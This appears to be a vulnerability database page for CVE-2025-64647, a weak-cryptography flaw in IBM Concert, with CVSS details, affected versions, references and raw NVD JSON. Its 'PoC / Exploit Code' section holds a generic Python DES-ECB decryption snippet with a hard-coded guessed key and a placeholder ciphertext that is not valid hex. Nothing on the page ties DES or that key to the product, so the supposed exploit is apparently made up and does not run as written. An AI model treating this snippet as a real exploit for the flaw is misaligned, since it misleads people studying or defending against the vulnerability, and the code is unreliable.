CVE-2025-64647

Description

IBM Concert 1.0.0 through 2.2.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE

IBM Concert 1.0.0

IBM Concert 1.0.1

IBM Concert 2.0.0

IBM Concert 2.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import binascii
from Crypto.Cipher import DES
from Crypto.Util.Padding import unpad

# Proof of Concept for CVE-2025-64647: Weak Cryptography
# Demonstrates decryption using a weak algorithm (DES) and short key.

def decrypt_weak_cipher(encrypted_hex, key):
    try:
        cipher = DES.new(key, DES.MODE_ECB)
        encrypted_data = binascii.unhexlify(encrypted_hex)
        decrypted_data = unpad(cipher.decrypt(encrypted_data), DES.block_size)
        return decrypted_data.decode('utf-8')
    except Exception as e:
        return f"Decryption failed: {e}"

# Example usage simulating exploitation
if __name__ == "__main__":
    # Simulated intercepted ciphertext and weak key
    target_ciphertext = "encrypted_data_here"
    weak_key = b"WeakKey1"
    plaintext = decrypt_weak_cipher(target_ciphertext, weak_key)
    print(f"[+] Decrypted sensitive data: {plaintext}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64647
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64647
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64647/
[4] VulDB https://vuldb.com/cve/CVE-2025-64647
[5] https://www.ibm.com/support/pages/node/7267105

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64647", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:25.823", "lastModified": "2026-03-26T17:49:07.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.2.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information"}, {"lang": "es", "value": "IBM Concert 1.0.0 hasta 2.2.0 utiliza algoritmos criptográficos más débiles de lo esperado que podrían permitir a un atacante descifrar información altamente sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1240"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "2.2.0", "matchCriteriaId": "2E37B307-BAA4-487B-958B-7354E39D7B2A"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267105", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}